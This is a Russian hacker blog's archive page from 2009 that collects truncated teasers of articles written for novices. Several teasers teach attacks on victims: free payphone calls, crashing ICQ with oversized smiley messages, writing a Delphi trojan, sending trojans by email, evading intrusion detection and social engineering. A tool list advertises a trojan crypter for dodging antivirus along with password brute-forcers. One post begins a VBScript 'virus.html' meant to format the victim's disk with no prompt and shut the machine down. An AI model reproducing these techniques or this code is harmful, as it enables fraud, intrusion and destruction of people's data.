Пятница, 29.03.2024, 13:04
Приветствую Вас Гость | RSS
xakers"
Главная | Регистрация | Вход
Меню сайта
Мини-чат
Наш опрос
Оцените мой сайт
Всего ответов: 55
Главная » 2009 » Февраль » 18

Данная атака на сервер проходит со 100% гарантией. Для успешной атаки взломщику необходимо дисковое пространство на сервере размером в 10 Kb (столько весит скрипт) и возможность запустить свой PHP скрипт. Далеко не секрет, что хакеры очень часто проникают в систему используя социнженерию, тоесть изначально подготавливают жертву, чтобы та им доверяла, получают от неё информацию и осуществляют взлом. Поэтому раздобыть на любом сервере небольшое дисковое пространство для хакера не проблема. В крайнем случае можно и купить себе домен на сервере провайдера или любой другой хостинговой компании, которую хакер собирается взломать. В большей части взлому подвержены бесплатные хостинговые компании и провайдеры, которые при регистрации доступа в интернет дают бесплатное место для размещение домашней странички пользователя с запуском собственных PHP скриптов. Идея реализации атаки заключается в том, чтобы залезть на жесткий диск провайдера и иметь возможность управлять ... Читать дальше »

Просмотров: 653 | Добавил: xakerd | Дата: 18.02.2009 | Комментарии (0)

Я предполагаю, что читатель знает, что такое CGI, и на этом построю своё объяснение. 

Начал я с малого. 

В любом чате фрейм, в котором ты пишешь сообщения, генерится динамически (для каждого входящего) и, возможно, содержит несколько скрытых полей. Типа <input type=hidden name=cookie value=SP202134> (так в партизанах хранится UserID) 

Идея в следующем: сохраняем содержимое этого фрейма на диске и исправляем его так, что бы можно было с ним работать со своего винта. Т.е. заменяем ссылки типа /cgi-bin/refresh.pl на полный путь www.chat.nsk.su/cgi-bin/refresh.pl и вместо скрытых полей формы пишем типа <input type=text name=cookie value=SP202134> (что бы можно было их изменять) После этого делаем HTML документ для "сборки чата" из кусков. Т.е. примерно так 

  "First.htm"
<html>
<frameset rows="80%,20%">
  <frameset cols="70%,30%">
  <frame name="razg"
  src="http://ww ... Читать дальше »

Просмотров: 739 | Добавил: xakerd | Дата: 18.02.2009 | Комментарии (0)

Звонки по межгороду и с телефонов автоматов
Старые телефоны-автоматы. Чтобы сделать устройство для бесплатных звонков по телефону-автомату, Вам потребуется кусок проволоки сантиметров 50 и металлический крокодильчик. Подойдет тот, который держит шторы на вашем окне. С одного конца провод совокупите с крокодильчиком, с другого оголите. Чтобы бесплатно поговорить:
1) прицепите один конец провода к металлическому приемнику монет.
2) Наберите нужный номер.
3) Когда абонент возьмет трубку, и вы услышите характерный щелчок из голодного монетоприемника. Оголенный конец провода просуньте через отверстия телефонной трубки, так, чтобы он касался металлической части микрофона и не отпускайте его на протяжении всего разговора.
УВЫ: действует это меньше чем на половине телефонов автоматах, поэтому придется побродить по разным переговорным пунктам в поисках нужных аппаратов.
Есть ещё один способ. В монете или жетончике просверливается крохо ... Читать дальше »

Просмотров: 591 | Добавил: xakerd | Дата: 18.02.2009 | Комментарии (0)

Тебе никогда не хотелось иметь у себя программу, с помощью которой можно ломать игрушки, shareware и trial программы и вообще все, что запускается на компьютере? Я думаю, что хотелось. А такая программа существует! И уже достаточно давно. Это SoftICE от NuMega Software. Просто считается, что ее использование это удел избранных программистов, разбирающихся в архитектуре процессора, устройстве железа, в ассемблере и принципах действия операционных систем. Но на самом деле и минимальных знаний достаточно для работы с этой программой. Сначала введу тебя в курс дела. 
SoftICE является самым мощным отладчиком на сегодняшний день (т.е. прогой, которая может разобрать по кирпичику любую другую прогу и каждый этот кирпичик изменить как захочется). А это значит, что с его помощью можно исследовать все: от ядра Windows до программ на С++. Создавался он для отладки 32-битных приложений, драйверов под Win NT и Win 95/98 и других программ под Win и Dos (так по кр ... Читать дальше »

Просмотров: 453 | Добавил: xakerd | Дата: 18.02.2009 | Комментарии (0)

[INLINE] AccessDiver
Программа. является тестором сайтов на наличие дыр и уязвимостей, имея столько
полезных фишеk,, что и перечислять страшно! Вот самые полезные из них: Проверка сайта
на уязвимости (до 100 ботов); cgi-scaner (с большой базой); подбирает пароль и логин
по словарю; проверяет прокси на анонимность (и скорость); имеет удобное окно для
пинга, где можно задать все параметры (кто не любит пинговать dial-up`щиков до
смерти?); и много другое!
Windows 95/98/ME/NT/2000/XP

[INLINE] AFIX!
Криптование троянов для невидимости от антивирей.

[INLINE] Advanced Password Generator
позволяет генерировать пароли любой длины состоящие из латинских букв, цифр, а так же
пароли содержащие и буквы и цифры. Единственное что Вам остается это запомнить
сгенерированный пароль.

[INLINE] Authforce
многопоточная программа грубого перебора паролей к Web сайту. Используя различные
методы, программа пытается подобрать ... Читать дальше »

Просмотров: 607 | Добавил: xakerd | Дата: 18.02.2009 | Комментарии (0)


Сервер АДСЛ connect 89.151.129.197

Сервер АДСЛ connect 89.151.129.197




Просмотров: 493 | Добавил: xakerd | Дата: 18.02.2009 | Комментарии (3)

Допустим, что у тебя есть какой-то сервер, который ты хочешь взломать или протестировать на защищенность от взлома. С чего нужно начинать? Что сделать в первую очередь? Сразу очень много вопросов и ни одного ответа. 

Четкой последовательности действий нет. Взлом - это творческий процесс, а значит, и подходить к нему приходиться творчески. Нет определенных правил и нельзя все подвести под один шаблон. Зато есть несколько рекомендаций, которых желательно придерживаться.

Приступим: 

Самое первое, с чего начинается взлом или тест системы на дырявость - сканирование портов. Для чего? А для того, чтобы узнать, какие сервисы/демоны установлены в системе. Каждый открытый порт - это сервисная программа установленная на сервере, к которой можно подключиться и выполнить определенные действия. Например, на 21-м порту висит FTP сервис. Если ты сможешь к нему подключиться, то тебе станет доступной возможность скачивания и закачивания на сервер файлов. Но ... Читать дальше »

Просмотров: 722 | Добавил: xakerd | Дата: 18.02.2009 | Комментарии (0)

1) Во-первых, юзаем проксю для своего Internet Explorer. Ищешь себе подходящую проксю, на www.proxychecker.ru . Например, мы нашли 195.141.45.2:1080, значит наша прокся по IP адресу 195.141.45.2 весит на 1080 порту. Заходи в Сервис>Свойства обозревателя... и заходишь на вкладку Подключение, там в списке "Настройка удаленного доступа" выбираешь свое соединение и жмешь Настройка. Ставишь галочку Использовать прокси-сервер и в Адрес пишешь адрес прокси, в нашем случае 195.141.45.2, и в поле порт 1080. Все. Проксю настроил, теперь жмешь OK. Теперь твой IP не виден на HTTP 2) Теперь научимся отправлять анонимное письмо. У меня, как и у многих других сайтов, есть такой сервис, как анонимная отправка письма (аноним мейл). Так вот, там можно указывать чужой ящик отправки, например, support@narod.ru и, самое главное, твой реальный IP не будет виден. К юзеру придет письмо от support@narod.ru и не с твоим реальным IP. 3) Теперь прячем IP в асе. Это не так трудно. Захо ... Читать дальше »

Просмотров: 411 | Добавил: xakerd | Дата: 18.02.2009 | Комментарии (0)

Привет тебе кул хацкер! Вот решил поделиться с тобой очередной уязвимостью аси. Вообщем могу с уверенностью сказать что эта фитча подвесит комп жертвы 99,9% файрволлов сноситься, правда есть одно но, даже 2. 

1) светиться твой ип (ну для того и создавали Proxy %) ) 
2) светиться номер твоей аси, ну это тоже не проблема т.к. за 30 секунд можно зарегить новый номер аси. Что мне понравилось это то, что для данной атаки на ICQ жертвы не нужно никаких программ (есть написанный эксплоит, но можно и без него)...

Итак в чем же заключается уязвимость. Барабанная дробь... =) А она заключается в простых графических смайликах!!! (типа icqimage0010 и тому подобные) Вот уж и не ожидал я этого...Обнаружено что если послать сообщение, заполненное такими смайликами (длинна 7000кб), то ася улетает секунд на 30, начиная пожирать системные ресурсы процессора, что приводит сами догадаетесь к чему. Это сообщение вешает асю из-за очень большого размера .dat файла в кот ... Читать дальше »

Просмотров: 399 | Добавил: xakerd | Дата: 18.02.2009 | Комментарии (0)

Обратная социальная инженерия: Он нуждается в вашей помоши.

Социальная инженерия: ваша жертва обычно остается в недоумении.

Обратная социальная инженерия: все проблемы устраняются, вопросов не остается.

Социальная инженерия: вы почти не контролируете ситуацию.

Обратная социальная инженерия: вы полностью контролируете направление и предмет беседы.

Социальная инженерия: подготовительной работы практически не требуется.

Обратная социальная инженерия: тщательное предварительное планирование; требуется предварительное получение доступа к месту действия.

Социальная инженерия: может применяться где угодно.

Обратная социальная инженерия: применяется только в определенных условиях.

Социальная инженерия в основном исходит из предпосылки, что вы — самозванец, притворяетесь, что у вас возникли затруднения и вам требуется помошь другого оператора. А вот обратная ситуация: проблемы возникают у легал ... Читать дальше »

Просмотров: 335 | Добавил: xakerd | Дата: 18.02.2009 | Комментарии (0)

SIM-lock, SP-lock, "кодировка": все эти слова говорят об одном: в телефоне 
стоит программное ограничение на работу мобильного телефона только в одной 
сети. Это делается для того, чтобы человек, купивший телефон у 
определенного оператора, не имел возможности перейти в другую GSM-сеть. 
Такие телефоны обычно продаются оператором за 10-20 процентов от их 
реальной стоимости, а остальную стоимость оплачивает оператор. Смысл таких 
акций простой: телефон с SIM-lock всегда останется работать только в одной 
сети и рано или поздно окупит оператору ту часть денег, которую он за него 
внес. В некоторых европейских странах абоненту через год (два) могут снять 
LOCK в сервисном центре или магазине так как телефон уже окупил свою 
стоимость. SIM-lock снимается набором кода с клавиатуры, обычно 8-15 цифр. 
Устанавливает SIM-lock на телефоны производитель или его представители. 
Оператор заказывает у производителя (например NOK ... Читать дальше »

Просмотров: 413 | Добавил: xakerd | Дата: 18.02.2009 | Комментарии (0)



И. Ильф, Е. Петров. Золотой теленок.

Хакерство — это здорово. Черт возьми, да это просто потрясающе! Но вместе с тем хакерство — нелегальное, порой аморальное и обычно наказуемое занятие. Даже если вы не сделали ничего плохого, для судей вам придется подыскать достаточно веское обоснование своим действиям. Самое малое, что может произойти, это заделка прорех в компьютерной безопасности, которые вы использовали для взлома. Более серьезные наказания могут варьироваться от штрафов и вплоть до тюрьмы. Неофициальные наказания могут заключаться в разрушении вашего оборудования и невозможности устроиться на работу, имеющую отношение к технике. Занимаясь своим делом, предусмотрительный хакер преследует две цели:

1. Не попасться. 2. Если попался, постараться не усугублять дела.

В этой главе рассказывается о стратегиях, с подошью которых можно следовать этим правилам. Хакерство предполагает не только технические знания, но и особый склад ума. И ... Читать дальше »

Просмотров: 1215 | Добавил: xakerd | Дата: 18.02.2009 | Комментарии (0)

Ты уже сто раз слышал это магическое слово «Троян». И мы уже много раз писали обзоры различных коней этой породы. В твоих извилинах, наверно уже давно крутиться мысль о создании собственного боевого коня. Сегодня тебе предстоит эта уникальная возможность. Даже если ты никогда не будешь использовать эти знания, тебе всё равно нужно знать, как работают трояны изнутри. 
Для простоты тела мы сделаем это на Delphi. Я выбрал этот язык, потому что тело журнала ограничено, и я не хочу вдаваться в подробности протоколов. 
Приготовься, нам предстоит написать сразу две проги. Одна будет находиться на твоей машине (клиент), другую надо будет подбросить жертве (сервер). Работы будет много, поэтому меньше слов, и ближе к телу. 
Троянский сервер: 
Итак, запускай Delphi или если он у тебя уже запущен, то создавай новый проект («File» – «New Application»). Сейчас мы примемся за серверную часть трояна. 
Для начала выбери пункт меню «Options» из меню «Project». Зде ... Читать дальше »

Просмотров: 450 | Добавил: xakerd | Дата: 18.02.2009 | Комментарии (0)

Взлом таксофонов !
Способов взлома-куча,один из способов!
Действует толко на телефоны фирмы Умет
Всовываем карточку,снимаем трубку,набираем номер,
кладем трубку,вытаскиваем карточку,и набераем например 02 )
этот способ не действует на некоторых телефонах, дело 
в том что АТС запоминает последний наброный номер,
команда 02 вызывает пофтор номера автомат
нажатия* не разлечает,для автомата,
ты набирая 01/02/03,
тоесть АТС повторяет номер, а автомат 
думает что ты звонишь 01/02/03


Просмотров: 433 | Добавил: xakerd | Дата: 18.02.2009 | Комментарии (0)

Что придумано одним, всегда может быть раскрыто другим. Подобной идеологии
придерживаются все хакеры мира. Какие бы средства для проверки надежности защиты
обслуживаемых систем и сетей не применялись системными администраторами, обязательно
найдется "умник", их "распечатывающий". На то и щука в пруду, чтобы карась не дремал.
Небезынтересно познакомиться с некоторыми инструментами, которые хакеры используют для
"прощупывания" чужих компьютерных систем и проникновения в них. Все программы, о
которых здесь пойдет речь, можно свободно скачать из Интернета.

Обычно хакер перед попыткой проникновения в незнакомую компьютерную систему проводит
ее разведку. Наиболее популярное средство для этого - программа Nmap. Она была создана
неким Fyodor'ом для операционной системы UNIX и первоначально представляла собой
обычный сканер портов, но впоследствии превратилась в одно из наиболее мощных средств
разведки.

Рисунок 1

С п ... Читать дальше »

Просмотров: 398 | Добавил: xakerd | Дата: 18.02.2009 | Комментарии (0)

А знаешь ли ты, друг мой, о том, как хакеры "вытаскивают" твои драгоценные аккаунты прямо у тебя из-под носа? Существует достаточно много случаев, когда пользователь с удивлением для себя обнаруживает, что за его счет бродит по просторам Интернет кто-то еще и, естественно, тратит направо и налево его потом и кровью заработанные деньги. Обнаружив столь неприятное происшествие, он в ярости (или в недоумении - кто как) звонит в техподдержку своего провайдера и объясняет причину своего недовольства. Провайдер приносит свои соболезнования, но, к сожалению, ничем помочь не может, однако, предлагает сменить пользователю пароль и советует не допускать до компьютера тех людей, которые не достойны доверия. А самое главное, что тем людям, которые платят свои деньги за часы, проведенные в Интернет, провайдер не собирается возмещать ни денег, ни времени. Разочаровавшись и обвиняя во всех мнимых грехах техническую поддержку, ты размышляешь о том, как же этому гадскому хакер ... Читать дальше »

Просмотров: 436 | Добавил: xakerd | Дата: 18.02.2009 | Комментарии (0)

Многие хакеры и не хакеры излагают свои версии “хакерской этики”, и почти все версии похожи друг на друга. Но часто крутые ребята-хакеры сначала следуют принципам, моральным установкам — Кодексу чести, — а затем их уводит в сторону. Им начинает казаться, что, зная закон, они получают право его нарушать: “Мы не действуем вслепую”. Так поступают крутые ребята — они знают, что они крутые, забывая при этом, что порой даже самые крутые хакеры на поверку оказываются полными тупицами.

Я хочу изложить вам свою собственную версию хакерского Кодекса чести. Это список моих убеждений, относящихся к миру компьютеров. Возможно, у вас совсем другие убеждения, но это не страшно — хакеры люди независимые. Впрочем, я хочу, чтобы вы поняли, почему так важно сформулировать кодекс чести и следовать ему. Это может уберечь вас от неприятностей. Я не хочу сказать, что, если вас поймают, суд обратит внимание на то, что вы вели себя в соответствии со своими принципами, ос ... Читать дальше »

Просмотров: 369 | Добавил: xakerd | Дата: 18.02.2009 | Комментарии (0)

Зачем нужен этот документ?

Как редактор "Жаргон-файла" ( Jargon File), я часто получаю электронную почту от
сетевых новичков-энтузиастов с вопросами, в конечном итоге сводящимися к одному: "Как
же мне научиться, чтобы стать кудесником-хэкером?". Достаточно забавно, что, насколько
можно видеть, нет никаких ЧаВО (FAQs) или Web-документов, содержащих ответ на этот
жизненно-важный вопрос. Так что вот вам мой.

Если вы читаете копию этого документа в офф-лайне, то текущая версия оригинала (на
английском языке) живет по адресу http://www.ccil.org/~esr/faqs/hacker-howto.html.

Что такое хэкер?

"Жаргон-файл" содержит кучу определений для термина "хэкер", большинство которых
связано с технической компетентностью и удовольствием, получаемым от решения проблем и
преодоления преград. Но если же вы хотите знать, как стать хэкером, то действительно
существенными являются два аспекта.

Имеется некоторое сообщество, некая о ... Читать дальше »

Просмотров: 411 | Добавил: xakerd | Дата: 18.02.2009 | Комментарии (0)

В пpоцессе исследования хакеpства как стиля жизни, на основе полученных
наблюдений мной были сгенеpены следующие пpавила, котоpые я без тени
ложной скpомности pешил назвать кодексом хакеpа.

1. Хакеp - всегда один, его личная жизнь состоит только из поездок в
общественном тpанспоpте, у него есть только одна девушка - машина.
2. ДОС - дыpява, ее можно ломать.
3. Hе будет никогда пpогpаммы, в котоpой не будет багов (пpоколов,дыpок,
глюков).
4. Hет такой пpогpаммы, котоpую невозможно взломать.
5. Hет идеальной опеpационной системы.
6. Хак как стиль жизни, а жизнь (всего лишь) как стиль пpогpаммиpования.
7. Женщины и компьютеp - NOT ! compatible things!
8. Хакеp способен поднять любую пpогpамму.

Пpогpаммы, котоpые должен знать хакеp
- Sourcer
- Qaid Analyzer
- Trubo Debugger
Документухи:
- Interrupt list by Ralf
- Tech Help
Пpогpаммы, котоpые должны вызывать pеакцию "Foo!"
Clipper x.xx
... Читать дальше »

Просмотров: 491 | Добавил: xakerd | Дата: 18.02.2009 | Комментарии (0)

Сразу предупреждаю что статья написанна для новичков в этом деле, поэтому не надо кричать и махать руками что типа всё это знаем и умеем, может вы и знаете и умеете, а другие только начинают учится и думаю им это будет полезно знать. Я знаю что об этом статьи уже писались и поэтому не претендую на полное авторство, но в тех статьях которые я видел всё описывалось скупо, отдельно, несвязанно с друг другом и неподробно, я же попытаюсь всё конкретизировать, обобщить и разложить по полочкам (даже разжевать:) так чтоб любой более менее начинающий юзверь мог во всё врубится. И так что для этого понадобится: 
The Bat! – один из лучших почтовых клиентов, (как у тебя его ещё нет, давай сейчас же дуй в какой нить поисковик , ищи его, скачивай, устанавливай и сноси нафиг свой ОутглюкЕхпресс, а то трояна впаришь не ты , а его впарят тебе, причём без твоего согласия). 
Zender – спецальная программа для посылки писем с трояном в дыру Оутглюка (качать с http://www.hack-i ... Читать дальше »

Просмотров: 406 | Добавил: xakerd | Дата: 18.02.2009 | Комментарии (0)

       Что можно сделать с IP адресом Как известно, Internet основана на семействе протоколов tcp/ip,                  определяющих, каким образом осуществляется взаимодействие между подключенными к сети компьютерами. Идентификация этих компьютеров осуществляется с помощью так называемых IP-адресов, каждый из которых представляет собой уникальный 32-битный идентификатор, обычно записываемый в виде четырех десятичных чисел, например, 192.168.0.1. И с точки зрения адресации сервер, обрабатывающий ежесекундно тысячи запросов практически ничем не отличается от вашего компьютера, подключаемого к сети по dial-up. Единственная разница домашний пользователь, как правило, получает так называемый динамический ip-адрес, меняющийся от подключения к подключению. В то время как адрес сервера должен быть доступен всем клиентам, желающим воспользоваться его услугами, клиент вовсе не обязан афишировать свой адрес на каждом углу. Более того, обнародование ip-адреса может привест ... Читать дальше »

Просмотров: 613 | Добавил: xakerd | Дата: 18.02.2009 | Комментарии (1)

целью настоящей работы является попытка несколько развеять устоявшееся мнение о
полной ненаказуемости хакерской деятельности основываясь на действующем российском
законодательстве. При анализе деятельности и определении мер ответственность
основной акцент делается на уголовной ответственности, как наиболее суровой и четко
регламентированной. Представляется, что исчерпывающе рассматривать меры
гражданско-правовой ответственности не представляется целесообразным в связи с
множеством их особенностей в каждом конкретном случае.

В настоящей работе дается попытка классифицировать (с юридической точки зрения)
различные направления деятельности многотысячной армии российских хакеров.
Предложенная классификация, как и основные положения настоящего материала являются
личным мнением автора, поэтому возможно статья не отвечает требованиям
всесторонности, полноты и объективности. Возможно, некоторые положения не
бесспорны, поэтому ... Читать дальше »

Просмотров: 408 | Добавил: xakerd | Дата: 18.02.2009 | Комментарии (0)

В последние годы телефонные террористы стали нормой нашей жизни и приведенные выше
звонки уже мало кого удивляют. Зная, что такое может произойти, люди зачастую даже не
задумываются о том, имеется ли какая-нибудь подоплека под таким звонком. Телефонные
"шутники" пользуются тем, что абсолютное большинство людей опасаются терактов и
поэтому такие "шутники" неистребимы. Но причем тут информационная безопасность? А
притом, что аналогичными методами пользуются и хакеры, пытающиеся проникнуть в
различные корпоративные сети и украсть какие-либо секреты. Эти методы, получившие
название social engineering (на русский язык переводится это плохо, хотя некоторые
авторы используют дословный перевод "социальный инжиниринг") и являются темой данной
статьи.

Как это бывает?

Случай первый. В разгар рабочего дня в операционном зале банка раздается звонок.
Молодая операционистка поднимает трубку телефона и слышит мужской голос ... Читать дальше »

Просмотров: 349 | Добавил: xakerd | Дата: 18.02.2009 | Комментарии (0)

Часто люди путаются между понятиями Spam и Mail-bomb. Spam - отправление на почтовый ящик огромного колличества сообщения (разбираются случае, когда отправить умышленно хочет наввредить человеку). Например: человек отправляет на почтовый ящик своего знакомого 5000 писем, при этом он его не "бомбит", а "спамит". Реально же почтовая бомба - это вредоносный скрипт, либо что-то другое, способное нанести вред информации, компьютеру и тд. Часто для написания вредоносных скриптов и почтовых червей используют Visual Basic Script. 
Далее следует пример скрипта, который прописывает в autoexec.bat строчки для беззапросного форматирования винчестера и выключает компьютер. Создайте файл virus.html и внесите в него код скрипта: 

<html>
<body>
<script language ="VBScript">
sub Reboot 'Процедурка перезагрузки
Set Shell=CreateObject("WScript.Shell")
Shell.Run "Rundll32.exe User.exe,ExitWindows" 'Вызов WinApi с помощью < ... Читать дальше »

Просмотров: 508 | Добавил: xakerd | Дата: 18.02.2009 | Комментарии (0)

Предисловие переводчика: небольшое введение к оригинальной статье было удалено, т.к. оно не относилось к делу. В нем описывалось как к Фреду пришла идея написать этот материал. Я его пропустил. Единственное, что надо добавить, - автор предупреждает, что к этому материалу надо относиться одновременно и серьезно и с определенной долей иронии. Многие пути применимы только для ОС Unix. 
Вставка посторонних символов в атаку, что обычно приводит к невозможности ее обнаружения. (Примечание переводчика - это касается систем обнаружения злоупотреблений, которые используют сигнатуры атак). 
Использование табуляций вместо пробелов в командах. Такое изменение разделителя может также привести к невозможности обнаружения атаки. 
Очень близкий путь к п.2. Вы могли бы изменить символ разделителя в системе (например, на %), что приведет к определенным проблемам с системами обнаружения атак. 
Измените стандартную последовательность действий при атаке. Например, если атака одинаково осущес ... Читать дальше »

Просмотров: 381 | Добавил: xakerd | Дата: 18.02.2009 | Комментарии (0)

Банковские автоматы и кредитные карточки уже давно появились на улицах больших городов и постепенно начинают входить в нашу жизнь. Что есть банкомат с точки зрения хакера? Правильно, источник халявы и быстрого способа заработать немного карманных деньжат. Ведь если украсть десяток--другой долларов, кто будет вас искать?

От банковских работников я слышал, что оправданными с финансовой точки зрения будут поиски похитителя, умыкнувшего в свой карман по крайней мере 300 вечнозеленых.

Уменьшим эту цифру вдвое для безопасности и примем полученные полтораста баксов в качестве того потолка, заходить за который не стоит даже в том случае, если очень--очень хочется купить новый микропроцессор или материнскую плату, а к ним быстрый модем впридачу.

Впрочем, с юридической точки зрения похищение даже одного доллара - кража. Поэтому, прежде чем отправляться к ближайшему банкомату с кусачками и отверткой, запаситесь на всякий случай парой адвокатов и захватите Шварценеггера на ... Читать дальше »

Просмотров: 928 | Добавил: xakerd | Дата: 18.02.2009 | Комментарии (0)

тебя научу как-раз заходить на чужие компы - сидеть в интернете на чужой счёт (Халява). Обьясняю принцип : Когда ты выходишь в Интернет, то ты входишь в сеть (т.е. имеется возможность заходить на другие компы!). Приготовления : Зайди в "Мой компьтер" --> "Панель Управления" --> "Сеть". Должны быть установлены следущие компоненты : Клиент для сетей Microsoft Контроллер удаленного доступа NetBEUI TCP/IP Наверняка у тебя нет "Клинта для сетей Microsoft" и "NetBEUI". Клиент : Кнопка "Добавить" --> "". В отрывшем окне выбери "клиент", справа - "Клиент для сетей Microsoft". NetBEUI : Кнопка "Добавить" --> "". В отрывшем окне выбери "Протокол". В отрывшем окне выбери "Microsoft", - "NETBEUI". Всё,Нажми "ОК", перезагрузись .
Дальше мы настроем свойства соединения :
Зайди в "Мой компьютер" --> "Удаленный доступ к сети".
Выбери своё соединение, вызови "Свойства".
На Вкладке "Тип сервера" должны быть галочки на :

Войти в сеть 
Программное сжатие данных 
... Читать дальше »

Просмотров: 342 | Добавил: xakerd | Дата: 18.02.2009 | Комментарии (0)

Форма входа
Календарь новостей
«  Февраль 2009  »
ПнВтСрЧтПтСбВс
      1
2345678
9101112131415
16171819202122
232425262728
Поиск
Друзья сайта
Статистика

Copyright MyCorp © 2024

Бесплатный хостинг uCoz